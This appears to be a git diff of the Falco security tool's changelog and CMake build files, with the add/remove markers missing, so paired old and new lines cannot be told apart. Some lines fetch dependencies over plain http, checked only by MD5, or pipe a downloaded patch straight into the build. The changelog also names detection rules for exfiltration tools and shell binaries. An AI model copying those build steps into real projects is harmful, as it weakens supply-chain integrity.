## Rule Changes
* Rework exceptions lists for `Create Privileged Pod`, `Create Sensitive Mount Pod`, `Launch Sensitive Mount Container`, `Launch Privileged Container` rules to use separate specific lists rather than a single "Trusted Containers" list. [[#651](https://github.com/falcosecurity/falco/pull/651)]
@@ -210,11 +114,11 @@ Released 2019-06-12
Released 2019-06-07
### Major Changes
## Major Changes
* Drop unnecessary events at the kernel level instead of userspace, which should improve performance [[#635](https://github.com/falcosecurity/falco/pull/635)]
### Minor Changes
## Minor Changes
* Add instructions for k8s audit support in >= 1.13 [[#608](https://github.com/falcosecurity/falco/pull/608)]
@@ -224,13 +128,13 @@ Released 2019-06-07
* Better tracking of rule counts per ruleset [[#645](https://github.com/falcosecurity/falco/pull/645)]
### Bug Fixes
## Bug Fixes
* Handle rule patterns that are invalid regexes [[#636](https://github.com/falcosecurity/falco/pull/636)]
* Fix kernel module builds on newer kernels [[#646](https://github.com/falcosecurity/falco/pull/646)] [[#sysdig/1413](https://github.com/draios/sysdig/pull/1413)]
### Rule Changes
## Rule Changes
* New rule `Launch Remote File Copy Tools in Container` could be used to identify exfiltration attacks [[#600](https://github.com/falcosecurity/falco/pull/600)]
@@ -256,9 +160,9 @@ Released 2019-06-07
Released 2019-05-13
### Major Changes
## Major Changes
* **Actions and alerts for dropped events**: Falco can now take actions, including sending alerts/logging messages, and/or even exiting Falco, when it detects dropped system call events. Fixes CVE 2019-8339. [[#561](https://github.com/falcosecurity/falco/pull/561)] [[#571](https://github.com/falcosecurity/falco/pull/571)]
* **Actions and alerts for dropped events**: Falco can now take actions, including sending alerts/logging messages, and/or even exiting Falco, when it detects dropped system call events. [[#561](https://github.com/falcosecurity/falco/pull/561)] [[#571](https://github.com/falcosecurity/falco/pull/571)]
* **Support for Containerd/CRI-O**: Falco now supports containerd/cri-o containers. [[#585](https://github.com/falcosecurity/falco/pull/585)] [[#591](https://github.com/falcosecurity/falco/pull/591)] [[#599](https://github.com/falcosecurity/falco/pull/599)] [[#sysdig/1376](https://github.com/draios/sysdig/pull/1376)] [[#sysdig/1310](https://github.com/draios/sysdig/pull/1310)] [[#sysdig/1399](https://github.com/draios/sysdig/pull/1399)]
@@ -275,7 +179,7 @@ Released 2019-05-13
* RHEL-based falco image: Provide dockerfiles that use RHEL 7 as the base image instead of debian:unstable. [[#544](https://github.com/falcosecurity/falco/pull/544)]
### Minor Changes
## Minor Changes
* ISO-8601 Timestamps: Add the ability to write timestamps in ISO-8601 w/ UTC, and use this format by default when running falco in a container [[#518](https://github.com/falcosecurity/falco/pull/518)]
@@ -289,13 +193,13 @@ Released 2019-05-13
* Improvements to sample K8s daemonset/service/etc files [[#562](https://github.com/falcosecurity/falco/pull/562)]
### Bug Fixes
## Bug Fixes
* Fix regression that broke json output [[#581](https://github.com/falcosecurity/falco/pull/581)]
* Fix errors when building via docker from MacOS [[#582](https://github.com/falcosecurity/falco/pull/582)]
### Rule Changes
## Rule Changes
* **Tag rules using Mitre Attack Framework**: Add tags for all relevant rules linking them to the [MITRE Attack Framework](https://attack.mitre.org). We have an associated [blog post](https://sysdig.com/blog/mitre-attck-framework-for-container-runtime-security-with-sysdig-falco/). [[#575](https://github.com/falcosecurity/falco/pull/575)] [[#578](https://github.com/falcosecurity/falco/pull/578)]
@@ -321,11 +225,12 @@ Released 2019-05-13
* Add `ash` (Alpine Linux-related shell) as a shell binary [[#597](https://github.com/falcosecurity/falco/pull/597)]
## v0.14.0
Released 2019-02-06
### Major Changes
## Major Changes
* Rules versioning support: The falco engine and executable now have an *engine version* that represents the fields they support. Similarly, rules files have an optional *required_engine_version: NNN* object that names the minimum engine version required to read that rules file. Any time the engine adds new fields, event sources, etc, the engine version will be incremented, and any time a rules file starts using new fields, event sources, etc, the required engine version will be incremented. [[#492](https://github.com/falcosecurity/falco/pull/492)]
@@ -335,7 +240,7 @@ Released 2019-02-06
* Support bundle: When run with `--support`, falco will print a json object containing necessary information like falco version, command line, operating system information, and falco rules files contents. This could be useful when reporting issues. [[#517](https://github.com/falcosecurity/falco/pull/517)]
### Minor Changes
## Minor Changes
* Support new third-party library dependencies from open source sysdig. [[#498](https://github.com/falcosecurity/falco/pull/498)]
@@ -351,11 +256,11 @@ Released 2019-02-06
* Add additional RBAC permissions to track deployments/daemonsets/replicasets. [[#514](https://github.com/falcosecurity/falco/pull/514)]
### Bug Fixes
## Bug Fixes
* Fix formatting of nodejs examples README [[#502](https://github.com/falcosecurity/falco/pull/502)]
### Rule Changes
## Rule Changes
* Remove FPs for `Launch Sensitive Mount Container` rule [[#509](https://github.com/falcosecurity/falco/pull/509/files)]
@@ -365,10 +270,10 @@ Released 2019-02-06
Released 2019-01-16
### Major Changes
## Major Changes
### Minor Changes
## Minor Changes
* Unbuffer outputs by default. This helps make output readable when used in environments like K8s. [[#494](https://github.com/falcosecurity/falco/pull/494)]
@@ -382,7 +287,7 @@ Released 2019-01-16
* Remove kubernetes-response-engine from system:masters [[#488](https://github.com/falcosecurity/falco/pull/488)]
### Bug Fixes
## Bug Fixes
* Ensure `-pc`/`-pk` only apply to syscall rules and not k8s_audit rules [[#495](https://github.com/falcosecurity/falco/pull/495)]
@@ -390,7 +295,7 @@ Released 2019-01-16
* Fix a regression where format output options were mistakenly removed [[#485](https://github.com/falcosecurity/falco/pull/485)]
### Rule Changes
## Rule Changes
* Fix FPs related to calico and writing files below etc [[#481](https://github.com/falcosecurity/falco/pull/481)]
@@ -407,25 +312,25 @@ Released 2019-01-16
Released 2018-11-09
### Major Changes
## Major Changes
* **Support for K8s Audit Events** : Falco now supports [K8s Audit Events](https://kubernetes.io/docs/tasks/debug-application-cluster/audit/#audit-backends) as a second stream of events in addition to syscalls. For full details on the feature, see the [wiki](https://github.com/falcosecurity/falco/wiki/K8s-Audit-Event-Support).
* Transparent Config/Rule Reloading: On SIGHUP, Falco will now reload all config files/rules files and start processing new events. Allows rules changes without having to restart falco [[#457](https://github.com/falcosecurity/falco/pull/457)] [[#432](https://github.com/falcosecurity/falco/issues/432)]
### Minor Changes
## Minor Changes
* The reference integration of falco into a action engine now supports aws actions like lambda, etc. [[#460](https://github.com/falcosecurity/falco/pull/460)]
* Add netcat to falco docker images, which allows easier integration of program outputs to external servers [[#456](https://github.com/falcosecurity/falco/pull/456)] [[#433](https://github.com/falcosecurity/falco/issues/433)]
### Bug Fixes
## Bug Fixes
* Links cleanup related to the draios/falco -> falcosecurity/falco move [[#447](https://github.com/falcosecurity/falco/pull/447)]
* Properly load/unload kernel module when the falco service is started/stopped [[#459](https://github.com/falcosecurity/falco/pull/459)] [[#418](https://github.com/falcosecurity/falco/issues/418)]
### Rule Changes
## Rule Changes
* Better coverage (e.g. reduced FPs) for critical stack, hids systems, ufw, cloud-init, etc. [[#445](https://github.com/falcosecurity/falco/pull/445)]
@@ -437,7 +342,7 @@ Released 2018-11-09
Released 2018-09-11
### Bug Fixes
## Bug Fixes
* Fig regression in libcurl configure script [[#416](https://github.com/draios/falco/pull/416)]
@@ -445,7 +350,7 @@ Released 2018-09-11
Released 2018-09-11
### Major Changes
## Major Changes
* Improved IPv6 Support to fully support use of IPv6 addresses in events, connections and filters [[#sysdig/1204](https://github.com/draios/sysdig/pull/1204)]
@@ -453,16 +358,16 @@ Released 2018-09-11
* New filterchecks `user.loginuid` and `user.loginname` can be used to match the login uid, which stays consistent across sudo/su. This can be used to find the actual user running a given process [[#sysdig/1189](https://github.com/draios/sysdig/pull/1189)]
### Minor Changes
## Minor Changes
* Upgrade zlib to 1.2.11, openssl to 1.0.2n, and libcurl to 7.60.0 to address software vulnerabilities [[#402](https://github.com/draios/falco/pull/402)]
* New `endswith` operator can be used for suffix matching on strings [[#sysdig/1209](https://github.com/draios/sysdig/pull/1209)]
### Bug Fixes
## Bug Fixes
* Better control of specifying location of lua source code [[#406](https://github.com/draios/falco/pull/406)]
### Rule Changes
## Rule Changes
* None for this release.
@@ -470,7 +375,7 @@ Released 2018-09-11
Released 2018-07-31
### Bug Fixes
## Bug Fixes
* Fix a problem that caused the kernel module to not load on certain kernel versions [[#397](https://github.com/draios/falco/pull/397)] [[#394](https://github.com/draios/falco/issues/394)]
@@ -478,25 +383,25 @@ Released 2018-07-31
Released 2018-07-24
### Major Changes
## Major Changes
* **EBPF Support** (Beta): Falco can now read events via an ebpf program loaded into the kernel instead of the `falco-probe` kernel module. Full docs [here](https://github.com/draios/sysdig/wiki/eBPF-(beta)). [[#365](https://github.com/draios/falco/pull/365)]
### Minor Changes
## Minor Changes
* Rules may now have an `skip-if-unknown-filter` property. If set to true, a rule will be skipped if its condition/output property refers to a filtercheck (e.g. `fd.some-new-attibute`) that is not present in the current falco version. [[#364](https://github.com/draios/falco/pull/364)] [[#345](https://github.com/draios/falco/issues/345)]
* Small changes to Falco `COPYING` file so github automatically recognizes license [[#380](https://github.com/draios/falco/pull/380)]
* New example integration showing how to connect Falco with Anchore to dynamically create falco rules based on negative scan results [[#390](https://github.com/draios/falco/pull/390)]
* New example integration showing how to connect Falco, [nats](https://nats.io/), and K8s to run flexible "playbooks" based on Falco events [[#389](https://github.com/draios/falco/pull/389)]
### Bug Fixes
## Bug Fixes
* Ensure all rules are enabled by default [[#379](https://github.com/draios/falco/pull/379)]
* Fix libcurl compilation problems [[#374](https://github.com/draios/falco/pull/374)]
* Add gcc-6 to docker container, which improves compatibility when building kernel module [[#382](https://github.com/draios/falco/pull/382)] [[#371](https://github.com/draios/falco/issues/371)]
* Ensure the /lib/modules symlink to /host/lib/modules is set correctly [[#392](https://github.com/draios/falco/issues/392)]
### Rule Changes
## Rule Changes
* Add additional binary writing programs [[#366](https://github.com/draios/falco/pull/366)]
* Add additional package management programs [[#388](https://github.com/draios/falco/pull/388)] [[#366](https://github.com/draios/falco/pull/366)]
@@ -517,7 +422,7 @@ Released 2018-07-24
Released 2018-04-24
### Major Changes
## Major Changes
* **Rules Directory Support**: Falco will read rules files from `/etc/falco/rules.d` in addition to `/etc/falco/falco_rules.yaml` and `/etc/falco/falco_rules.local.yaml`. Also, when the argument to `-r`/falco.yaml `rules_file` is a directory, falco will read rules files from that directory. [[#348](https://github.com/draios/falco/pull/348)] [[#187](https://github.com/draios/falco/issues/187)]
* Properly support all syscalls (e.g. those without parameter extraction by the kernel module) in falco conditions, so they can be included in `evt.type=<name>` conditions. [[#352](https://github.com/draios/falco/pull/352)]
@@ -526,7 +431,7 @@ Released 2018-04-24
* When signaled with `USR1`, falco will close/reopen log files. Include a [logrotate](https://github.com/logrotate/logrotate) example that shows how to use this feature for log rotation. [[#347](https://github.com/draios/falco/pull/347)] [[#266](https://github.com/draios/falco/issues/266)]
* To improve resource usage, further restrict the set of system calls available to falco [[#351](https://github.com/draios/falco/pull/351)] [[draios/sysdig#1105](https://github.com/draios/sysdig/pull/1105)]
### Minor Changes
## Minor Changes
* Add gdb to the development Docker image (sysdig/falco:dev) to aid in debugging. [[#323](https://github.com/draios/falco/pull/323)]
* You can now specify -V multiple times on the command line to validate multiple rules files at once. [[#329](https://github.com/draios/falco/pull/329)]
@@ -537,7 +442,7 @@ Released 2018-04-24
* If a rule has an attribute `warn_evttypes`, falco will not complain about `evt.type` restrictions on that rule [[#355](https://github.com/draios/falco/pull/355)]
* When run with `-i`, print all ignored events/syscalls and exit. [[#359](https://github.com/draios/falco/pull/359)]
### Bug Fixes
## Bug Fixes
* Minor bug fixes to k8s daemonset configuration. [[#325](https://github.com/draios/falco/pull/325)] [[#296](https://github.com/draios/falco/pull/296)] [[#295](https://github.com/draios/falco/pull/295)]
* Ensure `--validate` can be used interchangeably with `-V`. [[#334](https://github.com/draios/falco/pull/334)] [[#322](https://github.com/draios/falco/issues/322)]
@@ -546,7 +451,7 @@ Released 2018-04-24
* Make it possible to append to a skipped macro/rule without falco complaining [[#346](https://github.com/draios/falco/pull/346)] [[#305](https://github.com/draios/falco/issues/305)]
* Ensure rule order is preserved even when rules do not contain any `evt.type` restriction. [[#354](https://github.com/draios/falco/issues/354)] [[#355](https://github.com/draios/falco/pull/355)]
### Rule Changes
## Rule Changes
* Make it easier to extend the `Change thread namespace` rule via a `user_known_change_thread_namespace_binaries` list. [[#324](https://github.com/draios/falco/pull/324)]
* Various FP fixes from users. [[#321](https://github.com/draios/falco/pull/321)] [[#326](https://github.com/draios/falco/pull/326)] [[#344](https://github.com/draios/falco/pull/344)] [[#350](https://github.com/draios/falco/pull/350)]
@@ -801,13 +706,13 @@ All of these changes result in dramatically reduced CPU usage. Here are some com
* Sysdig Cloud Kubernetes Demo: Starts a kubernetes environment using docker with apache and wordpress instances + synthetic workloads.
* [Juttle-engine examples](https://github.com/juttle/juttle-engine/blob/master/examples/README.md) : Several elasticsearch, node.js, logstash, mysql, postgres, influxdb instances run under docker-compose.
| Workload | 0.2.0 CPU Usage | 0.3.0 CPU Usage |
| --------------------------------- | --------------- | --------------- |
| pts/apache | 24% | 7% |
| pts/dbench | 70% | 5% |
| Kubernetes-Demo (Running) | 6% | 2% |
| Kubernetes-Demo (During Teardown) | 15% | 3% |
| Juttle-examples | 3% | 1% |
| Workload | 0.2.0 CPU Usage | 0.3.0 CPU Usage |
|----------| --------------- | ----------------|
| pts/apache | 24% | 7% |
| pts/dbench | 70% | 5% |
| Kubernetes-Demo (Running) | 6% | 2% |
| Kubernetes-Demo (During Teardown) | 15% | 3% |
| Juttle-examples | 3% | 1% |
As a part of these changes, falco now prefers rule conditions that have at least one `evt.type=` operator, at the beginning of the condition, before any negative operators (i.e. `not` or `!=`). If a condition does not have any `evt.type=` operator, falco will log a warning like:

3
CMakeCPackOptions.cmake
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

116
CMakeLists.txt
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
@@ -14,40 +15,32 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
cmake_minimum_required(VERSION 3.3.2)
cmake_minimum_required(VERSION 2.8.2)
project(falco)
if(NOT SYSDIG_DIR)
get_filename_component(SYSDIG_DIR "${PROJECT_SOURCE_DIR}/../sysdig" REALPATH)
endif()
# Custom CMake modules
list(APPEND CMAKE_MODULE_PATH "${CMAKE_CURRENT_SOURCE_DIR}/cmake/modules")
list(APPEND CMAKE_MODULE_PATH "${SYSDIG_DIR}/cmake/modules")
option(BUILD_WARNINGS_AS_ERRORS "Enable building with -Wextra -Werror flags")
if(NOT DEFINED FALCO_VERSION)
set(FALCO_VERSION "0.1.1dev")
endif()
if(NOT DEFINED FALCO_ETC_DIR)
set(FALCO_ETC_DIR "/etc/falco")
endif()
if(NOT CMAKE_BUILD_TYPE)
SET(CMAKE_BUILD_TYPE Release)
endif()
if(NOT DRAIOS_DEBUG_FLAGS)
set(DRAIOS_DEBUG_FLAGS "-D_DEBUG")
endif()
string(TOLOWER "${CMAKE_BUILD_TYPE}" CMAKE_BUILD_TYPE)
if (CMAKE_BUILD_TYPE STREQUAL "debug")
set(KBUILD_FLAGS "${DRAIOS_DEBUG_FLAGS} ${DRAIOS_FEATURE_FLAGS}")
else()
set(CMAKE_BUILD_TYPE "release")
set(KBUILD_FLAGS "${DRAIOS_FEATURE_FLAGS}")
endif()
set(CMAKE_COMMON_FLAGS "-Wall -ggdb ${DRAIOS_FEATURE_FLAGS}")
if(BUILD_WARNINGS_AS_ERRORS)
set(CMAKE_SUPPRESSED_WARNINGS "-Wno-unused-parameter -Wno-unused-variable -Wno-unused-but-set-variable -Wno-missing-field-initializers -Wno-sign-compare -Wno-type-limits -Wno-implicit-fallthrough -Wno-format-truncation")
set(CMAKE_SUPPRESSED_WARNINGS "-Wno-unused-parameter -Wno-missing-field-initializers -Wno-sign-compare -Wno-type-limits -Wno-implicit-fallthrough -Wno-format-truncation")
set(CMAKE_COMMON_FLAGS "${CMAKE_COMMON_FLAGS} -Wextra -Werror ${CMAKE_SUPPRESSED_WARNINGS}")
endif()
@@ -66,28 +59,11 @@ if(CMAKE_SYSTEM_NAME MATCHES "Linux")
add_definitions(-DHAS_CAPTURE)
endif()
# Create the falco version variable according to git index
if(NOT FALCO_VERSION)
include(GetGitRevisionDescription)
git_get_exact_tag(FALCO_TAG)
if(NOT FALCO_TAG)
git_describe(FALCO_VERSION "--always")
git_local_changes(FALCO_CHANGES)
if(FALCO_CHANGES STREQUAL "DIRTY")
string(TOLOWER "${FALCO_CHANGES}" FALCO_CHANGES)
set(FALCO_VERSION "${FALCO_VERSION}.${FALCO_CHANGES}")
endif()
set(FALCO_VERSION "0.${FALCO_VERSION}")
else()
set(FALCO_VERSION "${FALCO_TAG}")
string(REGEX
REPLACE "^v([0-9]+)(\\.[0-9]+)(\\.[0-9]+)?"
"\\1\\2\\3"
FALCO_VERSION
${FALCO_VERSION})
endif()
if(CMAKE_BUILD_TYPE STREQUAL "Debug")
set(KBUILD_FLAGS "${DRAIOS_DEBUG_FLAGS} ${DRAIOS_FEATURE_FLAGS}")
else()
set(KBUILD_FLAGS "${DRAIOS_FEATURE_FLAGS}")
endif()
message(STATUS "Falco version: ${FALCO_VERSION}")
set(PACKAGE_NAME "falco")
set(PROBE_VERSION "${FALCO_VERSION}")
@@ -99,6 +75,10 @@ endif()
set(CMD_MAKE make)
if(NOT SYSDIG_DIR)
set(SYSDIG_DIR "${PROJECT_SOURCE_DIR}/../sysdig")
endif()
# make luaJIT work on OS X
if(APPLE)
set(CMAKE_EXE_LINKER_FLAGS "-pagezero_size 10000 -image_base 100000000")
@@ -128,7 +108,7 @@ else()
set(ZLIB_LIB "${ZLIB_SRC}/libz.a")
ExternalProject_Add(zlib
# START CHANGE for CVE-2016-9840, CVE-2016-9841, CVE-2016-9842, CVE-2016-9843
URL "https://s3.amazonaws.com/download.draios.com/dependencies/zlib-1.2.11.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/zlib-1.2.11.tar.gz"
URL_MD5 "1c9f62f0778697a09d36121ead88e08e"
# END CHANGE for CVE-2016-9840, CVE-2016-9841, CVE-2016-9842, CVE-2016-9843
CONFIGURE_COMMAND "./configure"
@@ -155,12 +135,12 @@ else()
set(JQ_INCLUDE "${JQ_SRC}")
set(JQ_LIB "${JQ_SRC}/.libs/libjq.a")
ExternalProject_Add(jq
URL "https://s3.amazonaws.com/download.draios.com/dependencies/jq-1.5.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/jq-1.5.tar.gz"
URL_MD5 "0933532b086bd8b6a41c1b162b1731f9"
CONFIGURE_COMMAND ./configure --disable-maintainer-mode --enable-all-static --disable-dependency-tracking
BUILD_COMMAND ${CMD_MAKE} LDFLAGS=-all-static
BUILD_IN_SOURCE 1
PATCH_COMMAND curl -L https://github.com/stedolan/jq/commit/8eb1367ca44e772963e704a700ef72ae2e12babd.patch | patch
PATCH_COMMAND wget -O jq-1.5-fix-tokenadd.patch https://github.com/stedolan/jq/commit/8eb1367ca44e772963e704a700ef72ae2e12babd.patch && patch -i jq-1.5-fix-tokenadd.patch
INSTALL_COMMAND "")
endif()
@@ -187,7 +167,7 @@ else()
message(STATUS "Using bundled nlohmann-json in '${NJSON_SRC}'")
set(NJSON_INCLUDE "${NJSON_SRC}/single_include")
ExternalProject_Add(njson
URL "https://s3.amazonaws.com/download.draios.com/dependencies/njson-3.3.0.tar.gz"
URL "http://download.draios.com/dependencies/njson-3.3.0.tar.gz"
URL_MD5 "e26760e848656a5da400662e6c5d999a"
CONFIGURE_COMMAND ""
BUILD_COMMAND ""
@@ -211,7 +191,7 @@ else()
set(CURSES_LIBRARIES "${CURSES_BUNDLE_DIR}/lib/libncurses.a")
message(STATUS "Using bundled ncurses in '${CURSES_BUNDLE_DIR}'")
ExternalProject_Add(ncurses
URL "https://s3.amazonaws.com/download.draios.com/dependencies/ncurses-6.0-20150725.tgz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/ncurses-6.0-20150725.tgz"
URL_MD5 "32b8913312e738d707ae68da439ca1f4"
CONFIGURE_COMMAND ./configure --without-cxx --without-cxx-binding --without-ada --without-manpages --without-progs --without-tests --with-terminfo-dirs=/etc/terminfo:/lib/terminfo:/usr/share/terminfo
BUILD_COMMAND ${CMD_MAKE}
@@ -238,7 +218,7 @@ else()
set(B64_INCLUDE "${B64_SRC}/include")
set(B64_LIB "${B64_SRC}/src/libb64.a")
ExternalProject_Add(b64
URL "https://s3.amazonaws.com/download.draios.com/dependencies/libb64-1.2.src.zip"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/libb64-1.2.src.zip"
URL_MD5 "a609809408327117e2c643bed91b76c5"
CONFIGURE_COMMAND ""
BUILD_COMMAND ${CMD_MAKE}
@@ -291,7 +271,7 @@ else()
ExternalProject_Add(openssl
# START CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
URL "https://s3.amazonaws.com/download.draios.com/dependencies/openssl-1.0.2n.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/openssl-1.0.2n.tar.gz"
URL_MD5 "13bdc1b1d1ff39b6fd42a255e74676a4"
# END CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
CONFIGURE_COMMAND ./config shared --prefix=${OPENSSL_INSTALL_DIR}
@@ -324,7 +304,7 @@ else()
ExternalProject_Add(curl
DEPENDS openssl
# START CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
URL "https://s3.amazonaws.com/download.draios.com/dependencies/curl-7.61.0.tar.bz2"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/curl-7.61.0.tar.bz2"
URL_MD5 "31d0a9f48dc796a7db351898a1e5058a"
# END CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
CONFIGURE_COMMAND ./configure ${CURL_SSL_OPTION} --disable-shared --enable-optimize --disable-curldebug --disable-rt --enable-http --disable-ftp --disable-file --disable-ldap --disable-ldaps --disable-rtsp --disable-telnet --disable-tftp --disable-pop3 --disable-imap --disable-smb --disable-smtp --disable-gopher --disable-sspi --disable-ntlm-wb --disable-tls-srp --without-winssl --without-darwinssl --without-polarssl --without-cyassl --without-nss --without-axtls --without-ca-path --without-ca-bundle --without-libmetalink --without-librtmp --without-winidn --without-libidn2 --without-libpsl --without-nghttp2 --without-libssh2 --disable-threaded-resolver --without-brotli
@@ -359,7 +339,7 @@ else()
set(LUAJIT_INCLUDE "${LUAJIT_SRC}")
set(LUAJIT_LIB "${LUAJIT_SRC}/libluajit.a")
ExternalProject_Add(luajit
URL "https://s3.amazonaws.com/download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
URL_MD5 "f14e9104be513913810cd59c8c658dc0"
CONFIGURE_COMMAND ""
BUILD_COMMAND ${CMD_MAKE}
@@ -389,7 +369,7 @@ else()
endif()
ExternalProject_Add(lpeg
DEPENDS ${LPEG_DEPENDENCIES}
URL "https://s3.amazonaws.com/download.draios.com/dependencies/lpeg-1.0.0.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/lpeg-1.0.0.tar.gz"
URL_MD5 "0aec64ccd13996202ad0c099e2877ece"
BUILD_COMMAND LUA_INCLUDE=${LUAJIT_INCLUDE} "${PROJECT_SOURCE_DIR}/scripts/build-lpeg.sh" "${LPEG_SRC}/build"
BUILD_IN_SOURCE 1
@@ -424,7 +404,7 @@ else()
set(LIBYAML_LIB "${LIBYAML_SRC}/.libs/libyaml.a")
message(STATUS "Using bundled libyaml in '${LIBYAML_SRC}'")
ExternalProject_Add(libyaml
URL "https://s3.amazonaws.com/download.draios.com/dependencies/libyaml-0.1.4.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/libyaml-0.1.4.tar.gz"
URL_MD5 "4a4bced818da0b9ae7fc8ebc690792a7"
BUILD_COMMAND ${CMD_MAKE}
BUILD_IN_SOURCE 1
@@ -460,7 +440,7 @@ else()
ExternalProject_Add(lyaml
DEPENDS ${LYAML_DEPENDENCIES}
URL "https://s3.amazonaws.com/download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
URL_MD5 "dc3494689a0dce7cf44e7a99c72b1f30"
BUILD_COMMAND ${CMD_MAKE}
BUILD_IN_SOURCE 1
@@ -485,7 +465,7 @@ else()
set(TBB_INCLUDE_DIR "${TBB_SRC}/include/")
set(TBB_LIB "${TBB_SRC}/build/lib_release/libtbb.a")
ExternalProject_Add(tbb
URL "https://s3.amazonaws.com/download.draios.com/dependencies/tbb-2018_U5.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/tbb-2018_U5.tar.gz"
URL_MD5 "ff3ae09f8c23892fbc3008c39f78288f"
CONFIGURE_COMMAND ""
BUILD_COMMAND ${CMD_MAKE} tbb_build_dir=${TBB_SRC}/build tbb_build_prefix=lib extra_inc=big_iron.inc
@@ -517,7 +497,7 @@ else()
endif()
ExternalProject_Add(civetweb
DEPENDS ${CIVETWEB_DEPENDENCIES}
URL "https://s3.amazonaws.com/download.draios.com/dependencies/civetweb-1.11.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/civetweb-1.11.tar.gz"
URL_MD5 "b6d2175650a27924bccb747cbe084cd4"
CONFIGURE_COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/lib
COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/include
@@ -597,15 +577,15 @@ else()
set(GRPC_SRC "${PROJECT_BINARY_DIR}/grpc-prefix/src/grpc")
message(STATUS "Using bundled grpc in '${GRPC_SRC}'")
set(GRPC_INCLUDE "${GRPC_SRC}/include")
set(GRPC_LIB "${GRPC_SRC}/libs/opt/libgrpc.a")
set(GRPCPP_LIB "${GRPC_SRC}/libs/opt/libgrpc++.a")
set(GRPC_LIB "${GRPC_SRC}/libs/opt/libgrpc_unsecure.a")
set(GRPCPP_LIB "${GRPC_SRC}/libs/opt/libgrpc++_unsecure.a")
set(GRPC_CPP_PLUGIN "${GRPC_SRC}/bins/opt/grpc_cpp_plugin")
get_filename_component(PROTOC_DIR ${PROTOC} DIRECTORY)
ExternalProject_Add(grpc
DEPENDS protobuf zlib c-ares
URL "https://s3.amazonaws.com/download.draios.com/dependencies/grpc-1.8.1.tar.gz"
URL "http://download.draios.com/dependencies/grpc-1.8.1.tar.gz"
URL_MD5 "2fc42c182a0ed1b48ad77397f76bb3bc"
CONFIGURE_COMMAND ""
# TODO what if using system openssl, protobuf or cares?
@@ -614,7 +594,7 @@ else()
BUILD_BYPRODUCTS ${GRPC_LIB} ${GRPCPP_LIB}
# TODO s390x support
# TODO what if using system zlib
PATCH_COMMAND rm -rf third_party/zlib && ln -s ${ZLIB_SRC} third_party/zlib && curl -L https://download.sysdig.com/dependencies/grpc-1.1.4-Makefile.patch | patch
PATCH_COMMAND rm -rf third_party/zlib && ln -s ${ZLIB_SRC} third_party/zlib && wget https://download.sysdig.com/dependencies/grpc-1.1.4-Makefile.patch && patch < grpc-1.1.4-Makefile.patch
INSTALL_COMMAND "")
endif()
@@ -626,6 +606,14 @@ add_subdirectory(test)
add_subdirectory(rules)
add_subdirectory(docker)
# Add path for custom CMake modules used to build dependencies from Sysdig (libscap, libsinsp)
list(APPEND CMAKE_MODULE_PATH
"${SYSDIG_DIR}/cmake/modules")
# Add path for custom CMake modules
list(APPEND CMAKE_MODULE_PATH
"${CMAKE_CURRENT_SOURCE_DIR}/cmake/modules")
if(CMAKE_SYSTEM_NAME MATCHES "Linux")
add_subdirectory("${SYSDIG_DIR}/driver" "${PROJECT_BINARY_DIR}/driver")
include(FindMakedev)
@@ -642,10 +630,10 @@ add_subdirectory(userspace/engine)
add_subdirectory(userspace/falco)
add_subdirectory(tests)
set(CPACK_PACKAGE_NAME "${PACKAGE_NAME}")
set(CPACK_PACKAGE_VENDOR "Sysdig Inc.")
set(CPACK_PACKAGE_CONTACT "opensource@sysdig.com")
set(CPACK_PACKAGE_DESCRIPTION_SUMMARY "Falco - Container Native Runtime Security")
set(CPACK_PACKAGE_DESCRIPTION_SUMMARY "falco, a system-level activity monitoring tool")
set(CPACK_PACKAGE_DESCRIPTION_FILE "${PROJECT_SOURCE_DIR}/scripts/description.txt")
set(CPACK_PACKAGE_VERSION "${FALCO_VERSION}")
set(CPACK_PACKAGE_FILE_NAME "${CPACK_PACKAGE_NAME}-${CPACK_PACKAGE_VERSION}-${CMAKE_SYSTEM_PROCESSOR}")
@@ -655,19 +643,19 @@ set(CPACK_PACKAGE_RELOCATABLE "OFF")
set(CPACK_GENERATOR DEB RPM TGZ)
set(CPACK_DEBIAN_PACKAGE_MAINTAINER "Sysdig <support@sysdig.com>")
set(CPACK_DEBIAN_PACKAGE_SECTION "utils")
set(CPACK_DEBIAN_PACKAGE_ARCHITECTURE "amd64")
set(CPACK_DEBIAN_PACKAGE_HOMEPAGE "https://www.falco.org")
set(CPACK_DEBIAN_PACKAGE_HOMEPAGE "http://www.sysdig.org")
set(CPACK_DEBIAN_PACKAGE_DEPENDS "dkms (>= 2.1.0.0)")
